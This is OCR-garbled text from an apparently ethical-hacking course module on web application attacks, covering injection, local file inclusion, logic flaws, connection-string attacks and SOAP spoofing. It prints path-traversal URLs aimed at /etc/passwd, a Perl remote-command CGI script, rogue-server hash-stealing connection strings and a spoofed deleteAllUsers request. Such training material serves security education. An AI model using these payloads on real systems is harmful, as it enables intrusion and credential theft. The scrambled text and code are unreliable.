SRGPua
deme SG
on
Bike
©7
HTTP
Cooke t-ooke A2bytePackets:1033.Displayed
53(51%)Dropped
00.0%) Profle Deft
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
PerformInjection/Input
ValidationAttacks EH
¢
normal
appiation’sintended
ue
Sa injection Flenjecton
traversalcharacters
filesonaserver
of inputs,
l eswithoutpropervalidation
ia
thereby
aweb
browser
enabling
Evade
added
and
other php exten phpexecution
Bypassing
= este 6 cort"page'
Secshee osehr 2
rrr
PerformInjection/Input
ValidationAttacks
Injectionattacksare very common in web applications. Theyexploitthe vulnerableinput
validationmechanism implemented bythe webapplication. Thereare manytypesof injection
attacks,suchas web scriptinjection,
OScommandinjection, SMTPinjection,LDAPinjection,
andXPathinjection.Anotherfrequentlyoccurring attackis a n SQL attack.
injection
ical andCountermensores
Mackin ©by E-Comel
Copyright
frequently
Injection takesplace whena browsersendsuser-provided
data to the interpreter
as
partof a commandor query. For launching attack,
an injection attackerssupply crafteddata
thattricksthe interpreter
into executing unintended commands of these
or queries.Because
Injectionflaws,attackerscan easilyread,create,update, and remove any arbitrarydata
to theapplication.
available In some cases,attackerscan even bypassa deeplynestedfirewall
environment andtakecomplete controlof the application
andits underlying
system.
Attacks/Input
Injection ValidationAttacks
To perform craftedmaliciousinput that is syntactically
injectionattacks,supply correct
according
to the interpreted
language
being usedto breakthe application's
normalintended
operation
Somewaysto perform attacks
injection a re describedbelow:
=
WebScripts Injection:If the user inputis usedinto dynamically
execute code,
enter
craftedinputthat breaksthe intendeddata context and executes commands on the
server
Injection:
0S Commands Exploit operating byentering
systems maliciouscodein input
fieldsif
applications
utilizea
SMTPInjection:
i n system-level
user input
Injectarbitrary
command
SMTPcommandsinto applications
and SMTPserver
conversationsto generatelarge
volumesof spamemail
SQLInjection: Enter a series of maliciousSQLqueriesinto inputfields to directly
manipulatethe database.
LDAPInjection:Takeadvantage of non-validatedwebapplication inputvulnerabilitiesto
passLDAPfiltersto obtaindirectaccessto databases.
XPathInjection:Entermalicious stringsi n inputfieldsto manipulate
the XPathqueryso
that it interfereswith the application's
logic.
BufferOverflow:Injecta large
amount of bogus
data beyond
the capacity
of the input
field
File Injection:
Injectmaliciousfiles byexploiting
“dynamic
file include―
mechanisms
in
webapplications.
Canonicalization: variablesthat reference
Manipulate (./)"to
fileswith “dot-dot-slash
access restricteddirectoriesi n the application
Note: For complete
coverageof SQLinjection and techniques,
concepts refer to Module 15
SQLInjection
PerformLocalFileInclusion(LF!)
Localfile inclusion(LF)vulnerability
enablesattackersto addtheir own fileson a server via a
webbrowser.Suchvulnerability ariseswhenan application addsfileswithout propervalidation
of inputs,thereby enabling
the attacker to modifythe input and embed pathtraversal
characters.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LEIvulnerability
is oftentriggered in PHP-based
websites.Simple PHPcodesusceptible to LFIis
into require()without proper validation,
given below.Attackerscan insert the URLparameter
$file
require
=GET[‘page’];
$
($file) ;
general,
In
ofthe
added.php
extensions
using
andotherextensions file
code
file
follows:
are added PHP as
=$_GET[
$file
require ($file
‘page’];
php");
Now,phpis appended to thefilename, whichmeans the user cannot findthe required
file becausefile /etc/passwd.php doesnot exist. If a n attackertries to insert null
bytes (#00)at theendof the attackstring,the .phpcan be easilyevaded:
http: //xyz.com/page=../../../../../../etc/passwds00
Anothermethodto evadethe addedphpis to add a question mark(2)to the attack
string:
http: //xyz.com/page=../../../../../../ete/passwd?
Bypassing
.phpexecution
LEIvulnerability
server
can read.txt filesbut not
and their file-ending .php
files because bythe
theyare executed
comprisessome code,Thiscan be evadedusing a built-in
php as
filter follows:
//xyz.com/index.php?page=php:
http:
encode/resource=index
//filter/convert .base64~
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackApplication
LogicFlaws
(©Most sppliation
flawsoccu due tothe neghgence
andfale assumptions
ofwebdevelopers
“©:
Completely
|G.Use
examine
too
BSuite
urp to thewebapplications
manipulate
requests
tothe
web
applieations
to the
ident lol lawsforexploitation
Retail
ApplicationWeb LogieFlawExploitation
Scenario
aw J*
Attack Application
LogicFlaws
In all web applications,
a vast amount of logic
i s applied
at everylevel.Theimplementation
of
some logic
can be vulnerableto various attacksthat will not be noticeable.Most attackers
mainly focuson high-level
attackssuchas SQLInjection, and XSSscripting, since they have
easilyrecognizable
signatures.Bycontrast,
application logicflawsare not associatedwith any
common signatures,making logic
the application flawsmore difficultto identify. Manually
testingof vulnerability this typeof flaw,whichenablesattackersto
scanners cannot identify
exploit
suchflawsto cause severe damageto theweb applications.
Most application
flaws arise from the negligence of developers.
andfalseassumptions
Application
logicflawsvary among differenttypesof web applications
andare not restrictedto
a particular
flaw. Acquiringknowledge on previouslyexploited
applications
with common logic
flawscan provide informationon how to approach
appropriate exploiting
flawsi n application
logic.
A common scenario the exploitation
illustrating of application
logicflaws by attackersis
describedbelow:
Scenario:
Identify
exploit
logic
and
flaws
applications,
In most retail web
retail
applications
placing
in
selecting
the processof
web
an orderincludes the
product,
finalizing
the order,
providing details,
payment and providing
delivery
details.
Thedeveloper assumesthat any customer wouldfollowall thelevelsi n a sequence as
designed. Identify suchapplications,and usingproxytoolssuchas Burp Suite,attempt
to controlthe requests sent to the web application.
Furthermore,attempt to bypassthe
third stage,i.e., jump from the secondstageto the fourth stagebymanipulating the
requests.Thistypeof attackis calledforcedbrowsing. Thisflawenablesthe attacker
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
avoid payingthe product price and receive the productat the delivery address.It can
resulti n severe financiallossesif an attackerintendsto exploit
it on a large
scale.
oo
Â¥ (rate on
Normal
User rosea
icons
smear
corns
98
|| attacker
Figure
14.75:
Screenshot
displaying
webapplication
ogi aw exploitation
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackSharedEnvironments
| Focexampl,amas cet
of
the
{ppaton, or clent may ployprovider
may
to of
vulnerable
service te cmoronie
webapglationthatexposes
the secant antherorgans
a ndcompromises
the wed spoiaton web
of
[tacks betweenapplications
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacksbetweenapplications
i n one web application
Vulnerabilitiesexisting mayallowattackersto execute malicious
scripts
andcompromise the security
following
of otherhostedweb applications.
scriptallowsattackersto executecommands remotely:
For example,
the
#1/usr/bin/pert
use strict,
use
print
CGT qu(:standardescapeHTâ„¢L)
header, start_html(*―)
;
if
(my
(param()) Sconmand =
param(*cnmd―)
;
;};
Sconmand="$command*
print “$command\n―
else (print start_form(); textfield
print end_html;
("command")
;}
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
AttackDatabaseConnectivity EH
Database
connection Y oconnectappiations
are used
strings engines
to database
{Example
ofacommon connection used to
string connet toa MierosoltSO Serverdatabase:
Database
connectity tacks exploit
theway applications
connect the taba instead
of abusing
database
‘Types of DataConnectivity
Attacks
EE crrecion stingetn
B
VY
EEcerecionsuin Parmeter
Poon
(3)
Ata
Comecion
Fo
bs
ConnectionString
Injection
Inacharacterinastring
1@ delegated
semicolon by
appending
authentication
environment
inletpaamaters connection ther wth he
Ader
Injection
Module4 1882
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
|
ConnectionString
ParameterPollution (CSPP)
Attacks CEH
values
\@ Trytooverwrite parameter intheconnectionstringto steal ver IDsando hijackwebcredentials
ConnectionPoolDoS
“a.
Baamine
ofthe large
theconnectionpooling
settings appleation,
Sat query andrun mutplequeres multaneously
construct malisous
to consume alleannectonsinthe
database
fal
poo,ausng
‘connection queriest forlegitimateusers
@ Example:
1
the
default
ImASPNET maximum allowed
connectonsinthepoolare 200andthe
cnscoaeconpol
scone aia Dost
pve
aes
tom
seng
ne©)
Attack DatabaseConnectivity
Databaseconnection stringsare usedto connect applications
to databaseengines.In these
attacks,attackerstarget a databaseconnection that formsa link betweena databaseserver
and its client software.A web application establishesa connection with the databaseby
providing a driverwith a connection stringthat holdsthe addressof a specificdatabaseor
server andoffers
instanceanduser authentication
credentials
ical andCountermensores
Mackin ©by E-Comel
Copyright
For
example
Server=sql_box; Database=Common;
User ID=uid; Pwd=password
Attacking can resultin unauthorizedcontrolover thedatabase.
data connectivity Attackso n
provide
data connectivity attackerswith access to sensitive databaseinformation.Database
attacksexploit
connectivity the way i n whichapplications connect to thedatabaseinsteadof
abusing
queries.
database
For this purpose,use methodssuchas connection string hashstealing,
attack,
injection port
andhijacking
scanning, webcredentials.
Thefollowing example
is an of a common connection stringusedto connect to a MicrosoftSQL
Server
database:
“Data Source=Server,Port; Network
©
Library=DBMSSOCN; Initial.
Catalog=DataBase;
User ID=Username;Password=pwd;―
Data connectivity of the following
attacksare types:
Connection String Injection:In a delegated
authenticationenvironment,attackers inject
i n a connection stringby
parameters appendingthemwith a semicolon. Thiscan occur
dynamic
‘when stringconcatenation is usedto buildconnection stringsaccording
to the
user input.
ConnectionString
Parameter Pollution (CSPP)
Attacks:Attackersoverwrite parameter
values
inthe connection string,
ConnectionPoolDos:Attackersexamine the connection pooling settingsof the target
application,
construct a large malicious SQL query, and run multiple queries
simultaneously
to consume all the connectionsin the connection pool,causingdatabase
queries
tofor users.
Connection
fal legitimate
StringInjection
A connection stringinjectionattackoccurs whenthe server usesdynamic stringconcatenation
to build connection strings
basedon the user input.If the server doesnot validatethe string
and does not allowthe malicioustext or charactersto escape,a n attackercan potentially
a semicolonand appending
connection stringusing the “last
For
access sensitive dataor other resources on the server.
attackbysupplying
example,an attackercouldmount an
an additionalvalue.Theattackerparsesthe
one wins" algorithm andsubstitutesa legitimate
valuewith a
hostileinput.
The connection stringbuilderclasses can eliminateguesswork and protectthe server from
syntaxerrors and security vulnerabilities.Theyprovide methodsand propertiescorresponding
to known key/value pairs permitted byeachdata provider. Eachclassmaintains a fixed
collectionof synonyms and can translatea synonym into the corresponding well-knownkey
name. The server checks forvalidkey/value pairsand an invalidpair throwsan exception.In
addition,it handlesthe injected
valuesi n a safemanner.
‘The
attackerscaneasily
injectparametersbysimply adding a semicolon(";―)
usingconnection
techniques
stringinjection i n a delegated
authenticationenvironment,
ical andCountermensores
Mackin ©by E-Comel
Copyright
In the followingexample,the systemasksthe user to give a username andpassword for
creating Here,
a connection string. the attackerenters the password
as "pwd; Encryption=off―;
thismeans that the attackerhasvoidedthe encryption Whenthe connection stringis
system.
populated, the encryptionvaluewill beaddedto the previouslyconfigured
set of parameters.
Connection ParameterPollution(CSPP)
String Attacks
Theserver uses connection stringsto connect applicationsto databaseengines. Connection
stringparameter (CSPP)
pollution techniques allow a n attackerto specifically exploitthe
semicolon-delimited databaseconnection stringsthat are constructeddynamically basedon
the user inputs fromweb applications.
In CSPP attacks,attackers
overwrite parametervaluesi n the connection stringto stealuser IDs
andhijack
webcredentials.
HashStealing
Replaces thevalueofthe DataSourceparameter with thatof a Rogue MicrosoftSQL
Serverandsetsthevaluesof username,datasource,andintegrated security as follows:
User_Value:
Security = true
Thus,
;
the resulting
Data Source =
Rogue
Server
Value: Password ; Integrated
connectingstringwouldbe:
Data source =
myServer; initial
Here,the parameters
=
catalog dbl; integrated security=no;
jogue Server; Password=; Integrated Security=true,
"DataSource" are overwritten. Thus,
and"IntegratedSecurity― the
application’s
built-indriverswill use the lastset of valuesinsteadof the previousones.
Now,whenthe Microsoft SQLServertries to connect to the rogueserver, the sniffer
runningin the rogueserver sniffsthewindow'scredentials.
Port Scanning
Theresulting
connection stringwouldbe:
ical andCountermensores
Mackin ©by E-Comel
Copyright
Data source =
myServer; initial catalog = dbl; integrated securitysno;
Data SourcesTargetServer, Target Port; Pa Integrated
Hijacking
WebCredentials
Tryto connect to the databaseusing the web application systemaccount insteadof a
user-provided
Inject
set
ofcredentials.
User_value:Data Source ;
=Target_server
PasswordValue: Integrated Security true
Theresulting
;
connection string
is:
=
Data source
Security=true:
=
Data
myServer; initial catalog
= dbl; integrated security=no;
Source=TargetServer, Target Port; Password=;Integrated
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackWebApplication
Client
in
(©Interacwthserversdeapplications
users andaccess unauthorized
data to
waysperform
unexpected malicious
actions
agains
the end
BDcoosssitescrnting Byredirectionatacts
BLete injection
eader BBFrame
jection
Forgery
Request
Attacks
tack Sesslon
Faton
ActiveXAttacks
Privacy
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks:Attackersdevelop
Redirection codeand linksthat resemble
a legitimate
site
that a user wants to visit; however,the URLredirectsthe user to a malicious
websiteon
whichattackers could potentially obtain the user’s
credentials andother sensitive
information.
Frame Injection:
Whenscripts do not validatetheir input,attackersinjectcodethrough
frames,Thisaffectsall the browsersand scripts that do not validateuntrustedinput,
Thesevulnerabilitiesoccur i n HTML pageswith frames.Another reason for this
vulnerability
is thatwebbrowsers
supportframeediting,
SessionFixation: Sessionfixation helpsattackershijackvalid user sessions. They
authenticatethemselves
usinga knownsession ID andthen use the knownsession ID to
hijack s ession.Thus,
a user-validated attackerstrick users and accessa genuineweb
server
using
existing
session
‘ActiveX
an
Attacks:Attackers
ID value.
lurevictims via emailor via a linkthat is constructedsuch
of remote execution codebecomeaccessible,
that the loopholes allowing the attackers
to obtainaccessprivileges
equal to thoseof authorized users.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackWebServices
CEH
business
and
spplieations onawil
iogi orattacks
12We services work atoplegacy
webapplations
ulerabiiies
a ndanyattack webserce
various
mediatelyexposean undering
WebServicesProbing
Attacks
ofthe
andKsentry
points,
applston
et aes
erty functions, andmessage
Schema
can
beIn
Sthe
we estsby selecting of operations
a
andformulating scoring
requestmessages
the XML that submited service
(0 Use
include OAP
andto
theverequests
ta
gan mals content request analas errs deeper
&
WebServiceAttacks:SOAPInjection
(©Injectm atiious querystringnthe user inputel d to bypasswebservices authentication
mechanisms
and
access backend
databases
(©.Thistack
works
SOL
Injection
attacks
salto
Spoofing
WebServiceAttacks:SOAPAction
‘Ws-Rtiacker
isonet byth
‘hat
ince asthefet cl element the
operations
(a aches usetol suchae WS-Atacherto
late the nudedinthe
recounet
|
WebServiceAttacks:WS-AddressSpoofing CEH
WS-addres
sdby
fhe
information
rather
the
thetach
tothe
than adress
SOAP
Regular
WS talc between clint andserver
SOAP
tlcreceived
‘nrequested
by
WS cent
WebServiceAttacks:XMLInjection
or
andweaknesses
in parser
wservice
attack generatelgialerors
a deniatof-service
eb
request
capabilites
n the processing
processing
ofthe XML
RecursivePayloads Payload
‘Oversize
WebServiceAttackTools
taster
meeps
(©toes Msp sth ML tor nd
Attack WebServices
Web
applications
integrated
vulnerable,
services
implement
particular
functionality.
oftenuse web
within the web applications
allowing
to
are vulnerable,
attackersto exploit
a
the applications
suchapplicationsthrough
themselvesbecome
the integrated
vulnerable
Ifwebservices
ical andCountermensores
Mackin ©by E-Comel
Copyright
web applications,
Webservices work atop the legacy and any attackon web service will
immediately expose an underlyingapplication’s
business and logicvulnerabilitiesfor various
attacks.Attackers can targetweb services usingvarious techniques,as web applications make
these services availableto users through different mechanisms. Hence, the possibility of
increases. Attackersexploit
vulnerabilities thesevulnerabilities
to compromise web services.
Thereare many reasons whyattackerstargetweb services. Attackerschoosean appropriate
attackdepending on the purposeoftheattack. merely
If attackers want to stopa webservice
fromserving intendedusers,then theycan launcha
DoS
attack requests.
bysending
numerous
~
> drab
Toes
‘Web Probing
Services Attacks
WSDLfilesare automateddocumentsconsisting of sensitive informationabout service ports,
connections formedbetweentwo electronicmachines, and so on. Attackerscan use WSDL
probing attacksto obtain informationabout the vulnerabilitiesin publicand privateweb
services,as well as to perform
an SQLattack
Awebservice probing attackinvolvesthe following
steps:
=
In the firststep,trapthe WSDLdocumentfromweb service trafficand analyze it to
determinethe purposeof the application, functionalbreakdown, entrypoints,and
message types
Createa set of valid requests byselecting a set of operationsand formulating the
requestmessages accordingto the rulesof the XML schema that can be submittedto
the webservice
Usetheserequests
to includemalicious
contents i n SOAP andanalyze
requests errors to
gaina deeper
understanding
of potential
securityweaknesses
ical andCountermensores
Mackin ©by E-Comel
Copyright
&
Figure Probing
14,78;Web Services atack
WebServiceAttacks:
SOAPInjection
SOAP is a lightweightandsimple
XML-based designed
protocol to exchange structuredandtype
informationo n the web.The XML envelope elementis always the root elementof a SOAP
message i n the XML schema.
SOAPinjection special
includes characters suchas singlequotes,
doublequotes, semicolons,
andso on.
attackerinjectsmaliciousquery stringsi n the user inputfield to bypass
‘The web service
authenticationmechanisms and accessbackenddatabases. to SQL
Thisattackworkssimilarly
attacks.
injection
Server Response
AccountLogi
igure14.79:We Services
Soap
Injectionattack
Spoofing
WebServiceAttacks:SOAPAction
Every SOAPrequest message contains an operation bythe application
that is executed and is
includedas the first childelementin the SOAPbody. WhenSOAPmessages are transmitted
UsingHTTP, a n additionalHTTP headerknownas SOAPActionis used.The operationto be
executedis includedin the SOAPAction header.Theheaderelementinformsthe receivingweb
service about the operationpresenti n the SOAPbody without the need to perform XML
parsing.Attackerscan exploit to manipulate
this optimization the operationsincludedin the
SOAPActionheaders.
For example,
considera web service that includestwo operations,
createUserand
deleteallUsers,
and is vulnerableto suchan attack.Assumethat thisweb service is protected
ical andCountermensores
Mackin ©by E-Comel
Copyright
bya gatewayandonlyauthorized
users whohavedirectcommunication with thewebservice
perform
can the deleteAllUsers An attackeri n front of the gateway
operation. can perform
a
spoofing
SOAPAction attackbymanipulating
theSOAPAction header asfollows:
messagecreating
AnHTTPrequest
POST /service HTTP/1.1for auser:
Host: certifiedHacker
SOAPAction: "createUser"
<Envelope>
<Header />
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
Theattackercan modifythe SOAPAction to “deleteallUsers―,
and the gatewaypassesthis
messagebecausethe SOAPbodyconsistsofthecreateUser
operation,
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "deleteAllUsers―
<Envelope>
<Header />
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
to perform
Attackersuse toolssuchas WS-Attacker spoofing:
SOAPAction
=
WS-Attacker
Source:https://github.com
is a tool for performing
Ws-Attacker
andeasy-to-use
open-source
tests of
automatic penetration
softwaresolutionwithmultiple
plugins web
services. Itis an
for differentattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
types,and it provides checking
a security interface, functionality
provides
WS-Attacker
to loadWSDLfilesandsendSOAPmessagesto the web service endpoints
andcan test if
any webservice is vulnerable
to attacks
suchas XML signature
wrapping,SOAPAction
spoofing,
andDoS.
fee pa
18.80:ScreenshotofWS-Attacker
Figure
Spoofing
WebService Attacks:WS-Address
provides
‘Ws-Address additionalroutinginformationi n the SOAPheaderto support
asynchronous
communication. Thistechnique allowsthe transmissionof web service requests
andresponsemessagesusingdifferentTCPconnections. It is essentialfor long-running
service
wherethe calculationtime of the server-sideapplication
requests exceedsthe lifetimeof a
TCP
single connection,
‘WS-Address includes an optional FaultToaddresselementfor statingan alternativeendpoint
that is to be usedi n case of any complications. Asthe requesterselectsthe endpointaddress
usedi n the ReplyTo and FaultToheaders, it is not securedproperly againsttamperingby
intermediaries. Although the specification
asksto perform digital on theseheader
signatures
fields,the values mostly depend on thedefaultsetting without anypropersecurity.
Thiscausesa vulnerability that can be exploited bythe attackerto perform the WS-Address
spoofing attack. In the WS-address spoofing attack,an attackersendsa SOAPmessage
ical andCountermensores
Mackin ©by E-Comel
Copyright
fakeWS-Address
containing information
to the server. The<ReplyTo>
headerconsistsof the
addressof the endpoint
selectedbythe attackerinsteadof theweb service client.Theendpoint
selectedbythe attackerreceives unnecessary trafficvia SOAPmessages. Furthermore, the
a massive amount of traffic,
attackermay generate thusresulting
i n a DoSattack.Attackersuse
to identify
toolssuchas WS-Attacker andexploit WS-addressingspoofing vulnerabilities,
SOAP
Regular
WS
trafic between cleat and server SOAP
Unrequested trac received by
WS
cent
of
WebServiceAttacks:
188: lustation
Figure
XMLInjection
WS-Address
spoofing
attack
applications
Web
sometimesas use XMLto store datasuch user credentials XMLdocuments;
attackerscan parse andview suchdatausingXPATH.XPATHdefinesthe flow the document
suchas theusername andpassword,
andverifiesuser credentials,
in
of
to redirectthemto a specific
user
account.
identify
Attackers the XPATH and insert an XML injectionor XML to bypass
schema the
authenticationprocess andgain unrestrictedaccessto the datastoredin XML.Theprocessby
which attackers enter valuesthat query XML takesadvantage of is an XML injection
attack.
Login
‘count
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Web Attacks
Parsing
Services
Parsing
attacksexploit
vulnerabilitiesandweaknesses capabilities
in the processing of the XML
parserto create a DoS attackor generate logical
errors i n web service requestprocessing. A
parsingattackis performed whenan attackersucceeds i n modifying
a file request
or string, The
attackerchanges the values bysuperimposing
one or more operating system commands via the
request.Parsing
Payloads
Recursive
whenexecutes
.bator
.cmd
is possible the attacker (batch) (command) files.
OversizePayloads
Attackerssenda payload that is excessivelylargeto consume all the system
resources,
renderingwebservices inaccessibleto other legitimateusers.
WebServiceAttackTools
=
Soapul
Pro
Source:https://www.soaput.org
SoapUI multiple
Prois a web service testingtool that supports suchas SOAP,
protocols
REST,
HTTP,JMS,AME,andJDBC.An attackercan use thistool to carryout webservice
probing,
SOAPinjection,
XMLinjection,
andweb service parsingattacks.
°
vst
Pope
Sommey
mraren
Esra
14.83;ScreenshotofSoap Pro
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
XMILSpy
Source:https://www.altova.com
Altova XMLSpy
is an XMLeditor and development
environment for modeling,
editing,
transforming,
anddebugging technologies.
XML-related
14.84Screenshot
Figure of xMSpy
ical andCountermensores
Mackin ©by E-Comel
Copyright
AdditionalWeb Application Tools
Hacking
TB verse
Qoee. sa
expioter
Sniper
(hetps://github.com)
\WsSiP(httpsi//github.com)
X Attacker(https://github.com)
timing_attack(https://github.com)
HTTrack (http://www.httrack.com)
SQLInjection Scanner(https://pentest-tools.com)
XSSScanner (https://pentest-tools.com)
SQLExploiter (https://pentest-tools.com)
HTTPRequest (https://pentest-tools.com)
Logger
WebCopier (http://www.
maximumsoft.com)
WPScan (https://wpscan.org)
Instant Source(https://www.blazingtools.com)
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
ModuleFlow
a
Application
‘Web Concepts
Woo
Applicaton
a
Web
Application API,
Wobhooks,
Threats find
Web
Web
|
Shell
| Application
‘Web Security
7
—
and Web Shell
Web API,Webhooks,
Recentyears havewitnessedan exponential increase i n the usageof webAPIsi n application
development. WebAPIshelpdevelopers i n building webapplications that retrieve data from
multipleonline sources. AswebAPIsare incorporated i n many popularapplications suchas
socialnetworking, shopping,andsearchengines,the importance of securingAPIsandtheir
integrityhasincreased.Anysecurity breachi n an API can expose personal or business-critical
datato attackers. Thissectiondiscusses
the basicconcepts of webAPI,webhooks, and web
shell;
APIvulnerabilitiesandhackingtechniques; andthe bestpractices forAPIsecurity.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is WebAPI?
(@ Using
cenralied
webhe and
gia
one
Dasiness increases
updating
and
changing
the
APreduces complety
central
lation
the tery of dts or
mu)
23 Bus
a
What is Web API?
API is an application
‘Web programminginterface
that providesonlineweb services to client:
sideapplications and updating
for retrieving datafrom multipleonline sources. It is a special
typeofinterfacewhereinteractionsbetweenapplications
can beallowed through the Internet,
protocols.
andsome web-based on the Internet and they
WebAPIsmakeresources accessible
are generally via the HTTP protocol.
accessed Theyalsoconsist of differenttypesof tools,
functions,and protocols
that can be used to develop
softwareor applications
without any
complexity.
For example,
consider that is supported
a traditionalweb application bymultiple
mobile
platformswith no centralizedAPI.Thisresultsi n the complexity of updating logicfor
business
eachindividualimplementation whenever thereis an update
centralizedweb API reducesthe complexity
i n the
client
applications
Using
and increases the integrityof updating
and
a
changing
the
data logic
at
or
one
central
business location
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
14.85:
of
lustration
WebAPL
WebServicesAPIs
HST Ani
which
ae aka now ac ETE re eign ang ES pes and TP
APIs
with
©
following
the
Stateless:
featurescan be referred to asto RESTful APIs:
Theclientend stores the state of the session;the server is restrictedto
save dataduringthe requestprocessing
(representations)
Cacheable:Theclient shouldsave responses i n the cache.This
featurecan enhanceAPIperformance
204 tical andCountermensores
Making by Comet
Copyright©
Environment:Boththeclientandthe server shouldbeindependent
Client-server of
eachotherbecause the server handlesbackendoperations
andthe clientis the front
endfromwhererequests are made
UniformInterface:
Resources must be specifically
andindependentlyrecognized via
a single
URL byemploying basicprotocol
methodssuchas PUT,POST, GET,and
DELETE,to a
Layered
andit shouldbe possiblemodifyresource
System:
Multiple-layer
architectureallowsintermediaryservers to supply
sharedmemory(cache)
to achievescalabilitybecausethe clientsystem directly
never notifiesthe main server of its connectivity,
‘Code
on Demand:
An
optional
featurewherethe server can alsoprovide
codeto the client,through
executable
customized
whichthe client’s
temporary
functionality
can be
XML-RPC: Extensible
communication protocol
uses proprietary
Markup
that usesa -
LanguageRemote ProcedureCall (XML-RPC)
specific XMLformatto transfer
XML to transferdata.It is simpler
is a
data,whereasSOAP
thanSOAPand uses lessbandwidth
to transfer
data,
JSON-RPC: JavaScriptObjectNotation RemoteProcedureCall (ISON-RPC]
-
is a
protocol
‘communication that serves i n the same way as XML-RPCbut uses the JSON
formatinsteadof XMLto transferdata.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What are Webhooks?
riggre
or push
basedon events suchas wes
Webhooks
allow
applations
otherapplications
update with
to
thedomainregistration
va wser
Interface
or API inform cents
shouttheoccurence ofane
‘What
are Webhooks?
on
you click the “Notify
for purchase.
me―
toan
bar get alertfromtheapplication
Thesenotificationsfromthe applications are usually
whenthat item is available
sent throughwebhooks.
Operation
of Webhooks
Webhooksare enrolledalong
with the domainregistration
via the user interfaceor API to
Informthe clientsabout a new event occurrence. The generated pathcontains the required
codethat automatically
executes on the new event accurrence. Here,systems neednot know
whatshouldbe run; theyjust need trace
‘Awebhookis a powerful
tool because
to the
pathto generate
everything
notifications.
remains isolatedon the web.Asshowni n the
figure below,when system-2 getsa notification
message fromtheselected pathofthe domain,
it not onlybecomes aware of new event occurrences on othermachines but also responds to
them. The pathcontains the codethat can be accessed via an HTTP POSTrequest. It also
informsthe user aboutfromwherethe message hasbeentriggered, includingits dateandtime
andotherdetailsrelatedto the event. Webhooks c an be privateor public
ical andCountermensores
Mackin ©by E-Comel
Copyright
System-1
web/TtP System-2
cl
ofwebhooks
18.86:Operation
Figure
‘Webhooks
vs. APIs
=
Webhooks fromwebsitesto the server. APIsare usedfor
are automatedmessages
server-to-website
communication.
Webhooks
only
getreportsor notificationsvia HTTPPOST
of the dataupdates.
APIsmakecallsirrespective
whena new update
is made.
Webhooksupdate
applications
or services with real-timeinformation.API needs
Webhooks
toperform activity.
implementations
additional this
havelesscontrolover dataflow.APIshaveeasycontrolover dataflow.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OWASP
Top10APISecurity
Risks
OWASPTop10API SecurityRisks
Source:https://www.owasp.org
According the following
to OWASP, are the top 10APIsecurity
risks:
API
Risks Description
exposethe endpoints
‘APIs handling objectidentifiers,
andthe
BrokenObject server componentdoesnot tracktheclientsstateproperly,
Level
Authorization
in amassive attack
resulting surface
Allowsthe attackerto modify
levelaccess controlflaw
the object's
unauthorizedaccess to the datasource
IDvalueand obtain,
BrokenUser
‘Vulnerabilities
in authentication
captureauthentication
can easily
‘Attackers
mechanisms
allow
attackers
tokensandstealuser identities
compromisethe APIsecurity
using
to
Authentication tokensandexploiting
‘authentication
Pls are vulnerable
implementation
to authentication
attacks
flaws
suchas credential
stuffing
andbrute-forcing
While
designing
API, expose
tothe
Excessive
clients
Data properties
the the developers
may
without considering
allthe object
their individual
Exposure anddepend
sensitivity
Allowsattackers
on the clientsfor filtering
to retrieve more information
data
thanrequested
Lackof avoid enforcing
‘APIs restrictionson the numberof resources
Resources
and requested bythe client
RateLimiting Allowattackersto consume alltheavailable resources,resulting
ical andCountermensores
Mackin ©by E-Comel
Copyright
unavailability
i n service to legitimateusers,causingDoS
Mayincludeauthenticationflawsthatcan beexploited
to
perform
brute-force
attacks
‘Complexity
i n access controlpolices
through
different
BrokenFunction hierarchies,
groups,and rolesbetweenadministrativeand regular
Level functionscan cause authorizationerrors
Authorization Allowattackers
to gain unauthorized
access to administrative
functions
or users’
resources
APIsaccidentally
exposetheinternalvariablesor objectsdue to
Mass improperbinding
andfiltering
basedon a whitelist
Assignment Allow
attackers modify
properties
withunauthorizedaccess to the object,
‘Security
misconfigurations
includevulnerabilitiessuchas insecure
defaultconfigurations,
ad-hocconfigurations,
opencloud
Security storage, HTTPheaders,
misconfigured permissivecross-origin
Misconfigurationresource sharing andmissingTLS/SSL.
(CORS),
Allowattackersto perform
system security
and compromise
various attacks
the
Sending untrusted mayresulti n
dataas queriesto the interpreter
injectionflaws,
suchas SQL, LDAP,XML,and command injection,
Injection Allowattackersto trickthe interpreterbysendingdatato
maliciouscommandsand gain unauthorizedaccess
‘execute
Improper
assetmanagement
occurs due to a lackof version
Improper
Assets
Management API older
controlfor
versions
of
hierarchies,and
that can be exploited
‘vulnerabilities
of APIconsists
bythe attacker
Insufficient
logging
system
along
Lackof proper
ineffective
vulnerable
andmonitoring with missingor
withincidentresponsecan makethe
integration
Logging and
Monitoring Allowto
‘and themaintain
systems persistenc
attackerscompromisesystem,
pivotto other
or destroydata
andnetworksto extract,tamperwith,
14.3: Risks
OWASPTop10.APSecurity
ical andCountermensores
Mackin ©by E-Comel
Copyright
APIVulnerabilities
fe oe! =
Vulnerabilities vulnerability,
flawscan cause serious
Design
Description
disclosing
information
Enumerated
Resources
through
the
public
unauthenticated API
Allowattackersto guessuser IDseasily,
of the user data
compromisingsecurity
|*video
files to that are vulnerablehotlinking
Sharing
Resources
via Thiscan cause severalproblems
suchas poor analyticsand strains
Unsigned
URLs andcan be usedbyattackersfor exploitation
(on resources,
limiting, Developers
andscoped
auto expiration,
use third-party
softwarelicenses
sharing
softwarelibrarieshaving
